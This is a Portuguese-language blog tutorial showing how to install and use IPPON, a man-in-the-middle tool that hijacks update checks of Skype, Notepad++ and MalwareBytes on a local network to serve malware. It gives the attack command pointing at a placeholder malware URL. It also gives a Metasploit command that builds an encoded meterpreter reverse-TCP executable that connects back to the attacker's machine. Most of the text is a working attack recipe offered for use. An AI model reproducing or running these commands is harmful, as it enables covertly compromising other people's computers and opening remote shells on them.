Primeiramente baixe a ferramenta no site oficial http://code.google.com/p/ippon-mitm/ ela vem “zipada”, utilize o comando abaixo para descompactar o pacote:
# unzip IPPON_dc17.zip
Como esta ferramenta é escrita em Python, é lógico que você precisa ter o python instalado em sua máquina, mas isso vem por padrão na maioria das distribuições Linux.
Agora vamos instalar os pacotes necessários para o funcionamento do IPPON. Primeiro vamos instalar o SCAPY com o comando abaixo:
# aptitude search python-scapy
Precisamos do servidor Ubigraph, que infelizmente não veio no repositório do Ubuntu 9.04, mas a instalação é tranqüila. Entre no site oficial do Ubigraph e baixe o pacote conforme sua distro e plataforma e em seguida o site vai te direcionar para uma pagina que mostrará como descompactar, instalar e executar o Ubigraph.
Site para download: http://www.ubietylab.net/ubigraph/content/Downloads/index.php
Redirecionado: http://ubietylab.net/ubigraph/content/Downloads/index.php
Siga os passos que esta em Redirecionado e pronto tudo esta funcionando, agora vamos ver como usar o IPPON, mas antes copie o arquivo ippon.py para dentro do diretório “examples/Python”do Ubigraph com o comando abaixo:
# cp ../ippon.py examples/Python/
Obs: este comando só vai funcionar se você executá-lo de dentro do diretório Ubigraph e levando em consideração que o mesmo esteja dentro do diretório Ippon.
Executando o ippon pela primeira vez:
# python examples/Python/ippon.py
Usage: ippon.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose bring the noise
Connectivity:
-i INTERFACE, --input-interface=INTERFACE
Interface to read packets from
-o INTERFACE, --output-interface=INTERFACE
Interface to write packets to
-l, --list-interfaces
List all available Interfaces
-w, --wireless-mode
Interface is wireless
Spicing:
-u URL, --mailicious-url=URL
Mailicious URL
Output:
-3, --3d-topology Live network topology in 3D
O arquivo targets.xml vem com o ippon, ele contém os programas alvo do ataque. Atualmente temos 3 alvos por padrão: MalwareBytes, Skype e Notepad++. Para iniciar um ataque basta executar o comando abaixo:
# ./ippon.py -i eth0 targets.xml -v -u http://linkparaomalware.com
Podemos criar um payload com o metasploit e copiar o arquivo para o nosso servidor web (http://linkparaomalware.com), assim quando o arquivo for carregado fará uma conexão reversa com o nosso metasploit. Um bom exemplo disso seria o comando abaixo no metasploit:
# ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP_SUA_MAQUINA LPORT=8080 8080 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o nome_do_arquivo.exe
Agora é só esperar um dos 3 programas se atualizar.
By Osvaldo
Nenhum comentário:
Postar um comentário